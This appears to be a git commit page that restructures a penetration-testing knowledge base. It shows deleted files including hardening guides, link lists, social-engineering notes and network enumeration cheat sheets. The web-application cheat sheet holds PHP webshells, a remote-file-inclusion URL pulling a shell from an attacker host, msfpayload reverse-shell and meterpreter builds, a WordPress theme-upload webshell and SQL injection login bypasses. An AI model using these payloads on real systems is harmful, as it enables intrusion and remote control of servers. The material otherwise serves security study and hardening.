Browse Source

Changed structure

Robert 7 years ago
183 changed files with 32 additions and 1770 deletions
  1. +4
      Draft/Draft/Anonymity Opsec
  2. +0
  3. +0
  4. +0
  5. +0
      Draft/Draft/Basic Security
  6. +0
      Draft/Draft/Building A Pentest
  7. +0
      Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
  8. +0
      Draft/Draft/CTFs &
  9. +0
      Draft/Draft/Cheat sheets reference
  10. +0
      Draft/Draft/Client Side
  11. +0
      Draft/Draft/Common CLI CMD Refs.rtf
  12. +0
      Draft/Draft/Common CLI CMD Refs/Curl.txt
  13. +0
      Draft/Draft/Common CLI CMD Refs/Metasploit.txt
  14. +0
      Draft/Draft/Common CLI CMD Refs/Ncat.txt
  15. +0
      Draft/Draft/Common CLI CMD Refs/Nmap.txt
  16. +0
      Draft/Draft/Common CLI CMD Refs/TCPDump.txt
  17. +0
      Draft/Draft/Common CLI CMD Refs/ToDO.txt
  18. +0
      Draft/Draft/Computer Hardware
  19. +0
      Draft/Draft/Con Videos
  20. +0
  21. +0
  22. +0
      Draft/Draft/Cryptography &
  23. +0
      Draft/Draft/Cryptography & Encryption/Linux Systems.txt
  24. +0
      Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  25. +0
      Draft/Draft/Cryptography & Encryption/cull.txt
  26. +0
  27. +0
  28. +0
  29. +0
  30. +0
  31. +0
      Draft/Draft/Documentation &
  32. +0
  33. +0
  34. +0
      Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Desktop.txt
  35. +0
      Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Server.txt
  36. +0
      Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows.rtf
  37. +0
      Draft/Draft/Draft/Securing Hardening/Securing iOS/List of Hardening Guides for iOS.txt
  38. +0
      Draft/Draft/Draft/Securing Hardening/Securing iOS/Securing iOS.rtf
  39. +0
  40. +0
  41. +0
      Draft/Draft/Draft/Software Defined Radio/Dongles.txt
  42. +0
      Draft/Draft/Draft/Software Defined Radio/Software Defined Radio SDR.txt
  43. +0
      Draft/Draft/Draft/Software Defined Radio/Software Defined Radio.rtf
  44. +0
      Draft/Draft/Draft/Steal Everything Kill Everyone
  45. +0
  46. +0
  47. +0
      Draft/Draft/Draft/System Internals Windows and Linux Internals
  48. +0
  49. +0
      Draft/Draft/Draft/To Do/4.txt
  50. +0
      Draft/Draft/Draft/To Do/Sections that Need Eyes.txt
  51. +0
      Draft/Draft/Draft/To Do/To Do.rtf
  52. +0
      Draft/Draft/Draft/To Do/add cull -1.txt
  53. +0
  54. +0
      Draft/Draft/Draft/UX Design - Because we all know how sexy pgp
  55. +0
      Draft/Draft/Draft/Various purpiose based OS'
  56. +0
      Draft/Draft/Draft/Web Applications/Add.txt
  57. +0
      Draft/Draft/Draft/Web Applications/Bypassing WAFs.txt
  58. +0
      Draft/Draft/Draft/Web Applications/Cheat Sheet.txt
  59. +0
      Draft/Draft/Draft/Web Applications/Cull integrate.txt
  60. +0
      Draft/Draft/Draft/Web Applications/Drupal.txt
  61. +0
      Draft/Draft/Draft/Web Applications/General Tips Trick.txt
  62. +0
      Draft/Draft/Draft/Web Applications/HTML5.txt
  63. +0
      Draft/Draft/Draft/Web Applications/Joomla.txt
  64. +0
      Draft/Draft/Draft/Web Applications/LFI RFI Local File Inclusion.txt
  65. +0
      Draft/Draft/Draft/Web Applications/Meta.rtf
  66. +0
      Draft/Draft/Draft/Web Applications/NO SQL Injection.txt
  67. +0
      Draft/Draft/Draft/Web Applications/SQLMap Cheat Sheet.txt
  68. +0
      Draft/Draft/Draft/Web Applications/Securing Web Applications.txt
  69. +0
      Draft/Draft/Draft/Web Applications/Tools/Brute Force Tools.txt
  70. +0
      Draft/Draft/Draft/Web Applications/Tools/JS PHP Decoders Unobfuscators.txt
  71. +0
      Draft/Draft/Draft/Web Applications/Tools/Meta.txt
  72. +0
      Draft/Draft/Draft/Web Applications/Tools/SQL Injection.rtf
  73. +0
      Draft/Draft/Draft/Web Applications/Tools/Scanners.txt
  74. +0
      Draft/Draft/Draft/Web Applications/Tools/Tools.rtf
  75. +0
      Draft/Draft/Draft/Web Applications/Tools/WebShells.txt
  76. +0
      Draft/Draft/Draft/Web Applications/Web Applications.rtf
  77. +0
      Draft/Draft/Draft/Web Applications/Wordpress.txt
  78. +0
      Draft/Draft/Draft/Web Applications/sqli cheat.txt
  79. +0
  80. +0
      Draft/Draft/Embedded Device
  81. +0
      Draft/Draft/Exploit Development/Anti-Fuzzing.txt
  82. +0
      Draft/Draft/Exploit Development/Assembly.txt
  83. +0
      Draft/Draft/Exploit Development/Cull.txt
  84. +0
      Draft/Draft/Exploit Development/Exploit Development.rtf
  85. +0
      Draft/Draft/Exploit Development/Exploit Development.txt
  86. +0
      Draft/Draft/Exploit Development/Exploit Development_1.rtf
  87. +0
      Draft/Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
  88. +0
      Draft/Draft/Exploit Development/MSF Framework Reference.rtf
  89. +0
      Draft/Draft/Exploit Development/Papers Tutorials Walk Throughs.txt
  90. +0
      Draft/Draft/Exploit Development/Writeups.txt
  91. +0
  92. +0
      Draft/Draft/Forensics/Anti-Forensics & Anti-Anti-Forensics – Michael.txt
  93. +0
      Draft/Draft/Forensics/add cull.txt
  94. +0
  95. +0
      Draft/Draft/Frameworks/Metasploit Reference.txt
  96. +0
      Draft/Draft/Frameworks/Meterpreter Scripts and Description.txt
  97. +0
      Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  98. +0
      Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Enumeration.txt
  99. +0
      Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  100. +0
      Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf

Draft/Draft/Draft/ → Draft/Draft/Anonymity Opsec View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Attacking → Draft/Draft/Attacking View File

Draft/Draft/Draft/Attacking → Draft/Draft/Attacking View File

Draft/Draft/Draft/Basic Security → Draft/Draft/Basic Security View File

Draft/Draft/Draft/Building A Pentest → Draft/Draft/Building A Pentest View File

Draft/Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt View File

Draft/Draft/Draft/CTFs & → Draft/Draft/CTFs & View File

Draft/Draft/Draft/Cheat sheets reference → Draft/Draft/Cheat sheets reference View File

Draft/Draft/Draft/Client Side → Draft/Draft/Client Side View File

Draft/Draft/Draft/Common CLI CMD Refs.rtf → Draft/Draft/Common CLI CMD Refs.rtf View File

Draft/Draft/Draft/Common CLI CMD Refs/Curl.txt → Draft/Draft/Common CLI CMD Refs/Curl.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Metasploit.txt → Draft/Draft/Common CLI CMD Refs/Metasploit.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Ncat.txt → Draft/Draft/Common CLI CMD Refs/Ncat.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/Nmap.txt → Draft/Draft/Common CLI CMD Refs/Nmap.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/TCPDump.txt → Draft/Draft/Common CLI CMD Refs/TCPDump.txt View File

Draft/Draft/Draft/Common CLI CMD Refs/ToDO.txt → Draft/Draft/Common CLI CMD Refs/ToDO.txt View File

Draft/Draft/Draft/Computer Hardware → Draft/Draft/Computer Hardware View File

Draft/Draft/Draft/Con Videos → Draft/Draft/Con Videos View File

Draft/Draft/Draft/Counter → Draft/Draft/Counter View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Cryptography & → Draft/Draft/Cryptography & View File

Draft/Draft/Draft/Cryptography & Encryption/Linux Systems.txt → Draft/Draft/Cryptography & Encryption/Linux Systems.txt View File

Draft/Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt → Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt View File

Draft/Draft/Draft/Cryptography & Encryption/cull.txt → Draft/Draft/Cryptography & Encryption/cull.txt View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Data → Draft/Draft/Data View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/ → Draft/Draft/ View File

Draft/Draft/Draft/Documentation & → Draft/Draft/Documentation & View File

Draft/Draft/Draft/Draft.rtf → Draft/Draft/Draft.rtf View File

+ 0
- 12
Draft/Draft/Draft/ View File

@ -1,12 +0,0 @@
Lockingpicking sites:
[Newbies guide to picking safes](

+ 0
- 97
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Desktop.txt View File

@ -1,97 +0,0 @@
Who is the target audience for this?
The intended target audience for the following information is not anyone trying to escape an oppressive regime or someone trying to avoid compromise from a nation-state entity.
It is intended as a guide for the lowest common denominator. I’m not going to write out a super long/secure guide only to have ten people use it. If you’re looking for a more effective hardening guide for windows, please check out these links:
Hardening Windows 7:
Hardening Windows 8:
Center for Internet Security(CIS) Guides to System Hardening:
With that said, most issues can be avoided through keeping your system up to date with Windows Update Services, not installing software from unknown locations, and not installing Flash or Java unless you must.
Securing Windows Desktop
Make sure your system has the latest updates and patches available through Windows Update Service.
Create a baseline configuration.
I advise that you create a security baseline once you have applied the latest patches and updates. This allows you to have a point of reference to work from. From this, you can start planning on what specific techniques you will use to harden your system.
Microsoft Baseline Security Analyzer Tool
Install the Exploit Mitigation Enhancement Toolkit.
It is recommended you install the Exploit Mitigation Enhancement Toolkit provided at no cost by Microsoft. It is a piece of software that reduces the effectiveness of exploits used by malware through various mitigation techniques. More information can be found here:
EMET Tutorial on installation/configuration
EMET Homepage:
Download link(EMET 5.0):
Windows Firewall
Windows firewall is enabled by default
By default it is set to implicit deny on incoming packets, and implicit allow for outgoing packets.
For a guide on configuring Windows firewall, check out Microsoft’s guide:
Also, Windows Firewall configuration through Powershell
AV. I will go on record, as saying that I do recommend some form of Anti-Virus. As for which one in particular, I will not say. I will however provide a link to comparisons of various AV:
Web Browser
If you really need to be told what Firefox is, I don’t even.
Firefox Plugins
One of the beautiful things Firefox are the plugins, and the extra functionality added through them. The list below is my recommendations for securing your browser as well as controlling what information it sends out.
Adblock - Blocks ads. Ads are a large vector of attack due to the lack of verification within the advertising industry.
Noscript - Allows for granular control of Javascript on pages.
Request Policy - Control the HTTP requests made by your browser to 3rd party websites.
Self destructing cookies - Prevent tracking and abuse of session information.
HTTPS Everywhere - Forces sites when possible to use HTTPS encryption.
Analyzing the Attack Surface(Only on Win7/Serv08 and below)
Release Announcement/Download:
Using the Attack Surface Analyzer:
Attack Surface Analyzer is a Microsoft verification tool designed to catalog changes in system state, runtime parameters, and securable objects on the Windows operating system. This analysis helps identify any increase in the attack surface that is caused by installing applications. Developed by the Security Engineering group team, Attack Surface Analyzer is the first tool of its kind available for public use, and it runs on the Windows Vista, Windows 7, and Windows Server 2008 operating systems.
Check the Encryption section of the overall guide for more information.

+ 0
- 28
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows Server.txt View File

@ -1,28 +0,0 @@
Hardening Windows Server
Firstly, if you are reading this hoping to learn how to harden production servers, stop what you’re doing, walk on over to HR, and hand in your notice.
For anyone who *isn’t* trying to harden production servers, please read this:
In, fact, even if you don’t, you should still read it. It lists several common gotchas that plague people new to hardening.
Having read that, here is Microsoft’s Security Compliance Manager wiki:
It supports Windows 7, Vista, Server 2008 and Server 2012.
Keep in mind that any server hardening should be custom tailored to your operation and environment. You can’t simply take a one-size fits all approach.
Some Links:
Server Baseline hardening:
Server 2008 Hardening Checklist:
Hardening Server 08 from Microsoft:

+ 0
- 0
Draft/Draft/Draft/Securing Hardening/Securing Windows/Securing Windows.rtf View File

+ 0
- 20
Draft/Draft/Draft/Securing Hardening/Securing iOS/List of Hardening Guides for iOS.txt View File

@ -1,20 +0,0 @@
List of Hardening Guides for iOS
Excellent forum post detailing general security practices:
Apple’s white paper on their security mechanisms built into iOS:
University of Texas’s Checklist/Guide to securing iOS:
Center for Internet Security Guide to securing iOS 7:
Australian Signals Intel Guide to securing iOS 7:
Excellent forum post detailing general security practices:

+ 0
- 0
Draft/Draft/Draft/Securing Hardening/Securing iOS/Securing iOS.rtf View File

+ 0
- 8
Draft/Draft/Draft/ View File

@ -1,8 +0,0 @@
* Summary: Shadow is a unique, open source discrete-event network simulator that runs real applications like Tor. Shadow combines the accuracy of emulation with the efficiency and control of simulation, achieving the best of both approaches
* Data Analysis System

+ 0
- 87
Draft/Draft/Draft/Social View File

@ -1,87 +0,0 @@
Social Engineering
[DiSC Overview](
* DiSC is a personal assessment tool used to improve work productivity, teamwork and communication. DiSC is non-judgmental and helps people discuss their behavioral differences.
DEF CON 22 Hacking Conference Presentation By Chris Hadnagy - What Your Body Tells Me - Body Language for the SE - Video and Slides.m4v
Research Papers
[Construal-Level Theory of Psychological Distance](
* Abstract: People are capable of thinking about the future, the past, remote locations, another person’s perspective, and counterfactual alternatives. Without denying the uniqueness of each process, it is proposed that they constitute different forms of traversing psychological distance. Psychological distance is egocentric: Its reference point is the self in the here and now, and the different ways in which an object might be removed from that point—in time, in space, in social distance, and in hypotheticality—constitute different distance dimensions. Transcending the self in the here and now entails mental construal, and the farther removed an object is from direct experience, the higher (more abstract) the level of construal of that object. Supporting this analysis, research shows (a) that the various distances are cognitively related to each other, (b) that they similarly influence and are influenced by level of mental construal, and (c) that they similarly affect prediction, preference, and action.
Books, Articles & Presentations
Source Gathering:
Art of Deception
Art of the Steal
Craft of Intelligence
Miss Manners guide to proper manners
Social Engineering: Art of Human Hacking
What EveryBODY is saying
Toastmaster's guide to body language
[Disguise - Appearance Hacking](
My notes from it: Why use makeup?
Blend into crow
Pose as employee/vendor
Regain access if caught
Create distraction for teammates
Whom to disguise as?
Sales Executive
Interview Candidate
Easy to see goings on
Sidewalk Sleeper
Transform into another person:
Can take minutes/hours
Examine each physical attribute
Some modified easier than others
Entire appearance makes the difference. One part is off, whole cover can be blown
If using hardhat, make sure to beat the shit out of it. Add stickers.

+ 0
- 5
Draft/Draft/Draft/Software Defined Radio/Dongles.txt View File

@ -1,5 +0,0 @@
FunCube dongle

+ 0
- 15
Draft/Draft/Draft/Software Defined Radio/Software Defined Radio SDR.txt View File

@ -1,15 +0,0 @@
Software Defined Radio
So you want to get into SDR talk

+ 0
- 0
Draft/Draft/Draft/Software Defined Radio/Software Defined Radio.rtf View File

+ 0
- 50
Draft/Draft/Draft/Steal Everything Kill Everyone View File

@ -1,50 +0,0 @@
##Steal Everything; Kill Everyone; Profit!
###j/k please don’t :3
####[Too Many Cooks; Exploiting the Internet of Tr-069](
####[Ever wanted to scan the internet in a few hours?](
####[The Eavesdropper’s Dillemma](
####Coding Malware for fun and no profit
* [Git Page](
* [TinyXPB-Winxp Bootkit](
* [Writing Malware for fun but not profit](
####[Use google bots to perform SQL injections on websites](
####[Device Pharmer](
####[Door Control Systems: An Examination of Lines of Attack](
####[Implanting a Dropcam](
####[Breaking IPMI/BMC](
####[Achilles Heel of the American Banking System](
####[Different Type of SCADA](
####[Attacking *multifunction* printers and getting creds from them](
* Proof of Concept of SSH Botnet C&C Using Python
####[Weapons of Mass Distraction](
* In this talk, we aim to briefly cover the background of sock puppets (and related attacks) before moving on to real world demonstrations & “attacks“. Rigging polls, abusing Twitter, causing Reddit riots & targeting popular news organisations are some of the (many) attacks covered. In all these cases we discuss what we tried, what worked, what didn’t and what the implications are of the attacks. Where possible we will cover defences and solutions.
####[Adding your protocol to Masscan](

+ 0
- 0
Draft/Draft/Draft/SysAdmin/SysAdmin.rtf View File

+ 0
- 71
Draft/Draft/Draft/SysAdmin/Windows.txt View File

@ -1,71 +0,0 @@
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](
* Official MS paper.
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](
[Second section good resource for hardening windows](
[Windows ISV Software Security Defenses](
Delta Copy](
* In technical terms, DeltaCopy is a "Windows Friendly" wrapper around the Rsync program, currently maintained by Wayne Davison. "rsync" is primarily designed for Unix/Linux/BSD systems. Although ports are available for Windows, they typically require downloading Cygwin libraries and manual configuration.
[The 10 Windows group policy settings you need to get right](
[Windows Performance Toolkit Reference](
[Harden windows IP Stack](
[GPO Best Policies](
[Understanding DEP as a mitigation Technology](
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](
[Windows Firewall Hook Enumeration](
* We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
[15 Ways to bypass Powershell execution-policy settings](
* Does what it says on the tin. Overall, its clear that execution-policy was not meant as a security method. Or if it was, someone was drinking a bit too much.
Protecting against Pass-The-Hash and other techniques
Cached Domain Credentials
Mitigating Kerberos Golden Tickets:

+ 0
- 95
Draft/Draft/Draft/System Internals Windows and Linux Internals View File

@ -1,95 +0,0 @@
[Linux Kernel Explanation/Walk through](
[Know your Windows Processes or Die Trying](
* Excellent quick reference on Windows proccesses with a focus on Win7. Good resource.
[Windows Program Automatic Startup Locations](
[Application Compatibility in Windows](
[Introduction to Windows Kernel Security](
[Technical Overview of Windows UEFI Startup Process](
[Windows 8 BOot](
[Windows 8 ASLR Explained](
[Collection of Windows Autostart locations](]
[Inside the Windows Vista Kernel: Part 1](
[How Control Flow Guard Drastically Caused Windows 8.1 Address Space and Behavior Changes](
[Pushing the Limits of Windows: Virtual Memory](
Linux References
[Memory Management: Paging](
[Linux Device Drivers book](
[X Window System Explained](
[Understanding the ELF](
[Linkers and Loaders - Book](
* These are the manuscript chapters for my Linkers and Loaders, published by Morgan-Kaufman. See the book's web site for ordering information.
* All chapters are online for free at the above site.
[ELF Format](
[Linker and Libraries](
Linux Filesystem infographic
* [Part 1](
* [Part 2](
[Anatomy of a program in memory](
* Writeup on the structure of program memory in Linux.
[How the Kernel manages Memory - Linux](
[Linux Documentation Project](
[Introduction to Linux - Machtelt Garrels](
* Excellent doc covering every aspect of linux. Deserves at least 1 skim through.
[Bash Guide for Beginners](

+ 0
- 8
Draft/Draft/Draft/Threat View File

@ -1,8 +0,0 @@
Threat Modeling
Guerrilla Threat Modelling (or 'Threat Modeling' if you're American)`

+ 0
- 198
Draft/Draft/Draft/To Do/4.txt View File

@ -1,198 +0,0 @@
Network Enumeration and Scanning Cheat sheet
Network Scanning and Mapping
Network Service Discovery
nmap -sSV -vv -PN --send-ip -A -O -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>nmap -A -vv -PN --send-ip -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>
Unicorn Scan
us -H -msf -Iv <address> -p 1-65535
us -H -mU -Iv <address> -p 1-65535
Layer 2 - Arp - netdiscover
netdiscover -i <interface> -r <address-range>
TCPDump Sniffing
tcpdump -s0 -xxXX -vv -i eth0 'host <address> and (dst port <num> or <num> )' | tee <address>_<service>_`date +%Y-%m-%d_%H:%M`.txt
or save the pcap file with additional flag (filename shortcut):
-w <address>_<service>_`date +%Y-%m-%d_%H:%M`.pcap
Locate VLAN Tagstcpdump -vv -i <interface> -s &ltsnap-length> -c <num-packet-count> 'ether[20:2] == 0x2000'
Specific Service Queries
DNS TCP and UDP 53 - DNS walking and Zone transfers
dig <domain> @<dns-server> AXFR | tee dns_<domain>_axfr._`date +%Y-%m-%d_%H:%M`.txt
DNS TCP and UDP 53 - DNS cache poisoning check
dig +short @<dns-server> txt
"<dns-server> is GREAT: 26 queries in 4.4 seconds from 26 ports with std dev 22336"
HTTP Web applications TCP 80,8000
nikto -h -p -C all -Display D -output nikto_<target-server><port>_`date +%Y-%m-%d_%H:%M`.txt -Format txt
cd /pentest/web/dirbuster && java -jar DirBuster-0.12.jar
WFuzz -c -z file,<wordlist> --hc 404 -o <html|magictree> http://<site-url>/FUZZ
./ -c -z file,/pentest/passwords/wordlists/combined --hc 404 -o html http://<site-url>/FUZZ 2> /dev/null
HTTP commands for webserver enumeration
nc <target-address> <port>
IIS 6.0
openssl s_client -connect <target-server>443 -state -debug
SSL_connect:before/connect initialization
... ... ... cut ... ... ...
SSL_connect:SSLv3 write client key exchange A
... ... ... cut ... ... ...
HTTP/1.1 302 Found
Date: Mon 02 Apr 2012 06:53:49 GMT
Server IBM_HTTP_Server/ Apache/2.0.47 (Unix)
... ... ... cut ... ... ...
SNMP commands UDP 161
snmpwalk -c public -v[1|2c] <target-server> | tee <address>_snmp_`date +%Y-%m-%d_%H:%M`.txt
SNMPv2-MIB::sysDescr.0 = STRING: hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (24030770) 2 days, 18:45:07.70
SNMPv2-MIB::sysContact.0 = STRING: System contact unknown at this time
SNMPv2-MIB::sysName.0 = STRING:
SNMPv2-MIB::sysLocation.0 = STRING: System location unknown at this time
SNMPv2-MIB::sysServices.0 = INTEGER: 72
... ... ...
/ public linux.txt
UPTIME... ... ...
HOSTNAME... ... ...
... ... ...
MOUNTPOINTS... ... ...
... ... ...
./onesixtyone -c <dictionary-file> -i <hosts-file> -o <address-range>_snmp_`date`.log -w
./onesixtyone <target-address>
Scanning 1 hosts, 2 communities [public] hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
./ -c <community-name> -v <version 1,2> -t <address-range> v1.8 - SNMP enumerator
Copyright (c) 2005-2011 by Matteo Cantoni (
[*] Try to connect to
[*] Connected to
[*] Starting enumeration at 2011-07-25 10:32:58
[*] System information
Hostname :
Description : hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
Uptime system : 0.00 seconds
Uptime SNMP daemon : 2 days, 18:17:07.01
[*] Network information
... ... ...
[*] Network interfaces
... ... ...
[*] Routing information
... ... ...
[*] Listening TCP ports and connections
... ... ...
Samba/CIFS/NETBIOS TCP 135,139,445
nbtscan -v -s : -r <address-range> | tee <address-range>_nbtscan_`date +%Y-%m-%d_%H:%M`.txt
SMBClient - Discover and mount shares
smbclient -L \\\<target-address>\\ -U <Username>
smbclient -U <Username> -W <Workgroup> \\\\<target-address>\\\<sharename>
RPC, PortMapper and NFS TCP/UDP:111
rpcinfo -p >target-address> | tee <address>_rpcinfo_`date +%Y-%m-%d_%H:%M`.txt
showmount -e <ip-address>
mount <ip-address>:<exported_path> <local_path>
Tunnelling and Pivoting
SSH Tunnelling and pivoting
ssh -v -f -N -L <localIP>:<local-port>:<dest-ip>:<dest-port> <user>@&ltpivot-host> -i <authentication-key-file>
Verbosity (-v), Background (-f), No command execution (-N), Local port forwarding (-L)
Forward localhost port 25 to the localhost of using ssh DSA key
ssh -v -f -N -L user@ -i /dsa/1024/f1fb2162a02f0f7c40c210e6167f05ca-16858
Proxy Chains
Dual-honed proxies or for proxying some port-scans
Edit the configuration file:
Under the ProxyList section:
http <proxy-server-ip> <port>
Execute with:
proxychains &ltsocket-aware command>
proxychains nmap -sT -vv --send-ip -pT:21,22,25,80,443,445,3389 <target-address>
Posted 22nd February 2012 by Tim Arneaud

+ 0
- 76
Draft/Draft/Draft/To Do/Sections that Need Eyes.txt View File

@ -1,76 +0,0 @@
Android - Encryption
Android - Analyzing Attack Surface
Computer Hardware attacks - General
Con Videos - Add Defcon Archive; Shmoocon/Ruxcon/etc.
Counter Surveillance - Legit info
Crypto Currencies - In general
Crypto - General/form
Darknets - More than just reddit
Data Visualization - More in general
Disclosure - Some historical things
Forensics - Integrate from cull list
Fuzzing - Educational stuff; more writeups
Google Hacking - Completely empty
Honeypots - More
Lockpicking - needs fucks
Logging - More for all
Malware - Structure, clean out cull
Network Attacks and Defense - Structure, clean out cull, add more
Recon - Structure/more/cull
OSINT - Structure/clean out cull
Passwords - Clean out cull/structure/more
Phishing Under Client Side Attacks
Persistence - Needs some lovin
Programming - Some stuff
Pwning Skiddies - meh/Needs more
Reverse Engineering - Structure/clean out cull/more
Rootkits - Needs more/Structure
Securing & Hardening - Structure/simplify
Social Engineering - Could do with a touch up
SDR - needs work
SysInternals - Always use more
Tor - Needs mo
Threat Modeling - Needs more
UX/Design - Could do with a few more links
Sysadmin - Always more
WebApp - Structure/cleanup/clear out cull
Wireless Networks - More info/structure

+ 0
- 0
Draft/Draft/Draft/To Do/To Do.rtf View File

+ 0
- 101
Draft/Draft/Draft/To Do/add cull -1.txt View File

@ -1,101 +0,0 @@
Elaborate on packers
[Thousands of MongoDB installations on the net unprotected](
[Windows 8 Security and ARM](
APK File Infection on an Android System - DEFCON;list=PLCDA5DF85AD6B4ABD
Unmasking Careto through Memory Analysis - Andrew Case
PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
Cull the interesting papers
[Android-x86 Project - Run Android on Your PC](
* This is a project to port Android open source project to x86 platform, formerly known as "patch hosting for android x86 support". The original plan is to host different patches for android x86 support from open source community. A few months after we created the project, we found out that we could do much more than just hosting patches. So we decide to create our code base to provide support on different x86 platforms, and set up a git server to host it.
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications.
Check under research section
Go through
Compare resources against what power-view can grab
Compare against sysmon service for scaling, setting it as service with scripting
Shellshock bug writeup by lcamtuf
[Access control best practices](

+ 0
- 15
Draft/Draft/Draft/ View File

@ -1,15 +0,0 @@
Site list: (NO CP)
Tor Search Engine

+ 0
- 11
Draft/Draft/Draft/UX Design - Because we all know how sexy pgp View File

@ -1,11 +0,0 @@
[Nielsen Norman Group](
* Evidence-Based User Experience Research, Training, and Consulting
* check articles and guidelines, ignore other sections

+ 0
- 24
Draft/Draft/Draft/Various purpiose based OS' View File

@ -1,24 +0,0 @@
Things I will not sort and only dump here
Kali linux
PenQ is an open source, Linux-based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more.
The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source. While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

+ 0
- 36
Draft/Draft/Draft/Web Applications/Add.txt View File

@ -1,36 +0,0 @@
Add content for:
Audit Frontpage/Sharepoint sites
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
XSS attack examples/ideas
Github dorks - finding vulns
Arachni Web Scanner - XSS challenges
Intro to content Security Policy

+ 0
- 3
Draft/Draft/Draft/Web Applications/Bypassing WAFs.txt View File

@ -1,3 +0,0 @@
Bypassing WAFs

+ 0
- 98
Draft/Draft/Draft/Web Applications/Cheat Sheet.txt View File

@ -1,98 +0,0 @@
Web Application exploitation - a cheatsheet By Tim Arneaud
If you want to get the full article, please go to the Source.
WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI):
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
Specific Web applications
Joomla default database configuration filename
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/ -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer -url <target-and-joomla-path> -type joomla
WordPress default database configuration filename
WordPress default login page
<web-app-path> /wp-login.php
WordPress plugins
<web-app-path> /wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx
upload via web interface as an installed theme
Command execution access is via:
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)
Cacti default database configuration filename
<web-app-path> /include/config.php
DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path> /inc/mysql.php
Drupal default database configuration filename
<web-app-path> /sites/default/settings.php
Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal
Timeclock default database configuration filename
SQL Terminators/Comments
<sql injected command>;--
<sql injected command>;#
Login Pages Basic SQL injection
' OR '1=1';--
'OR 1=1--
SQLMap commands
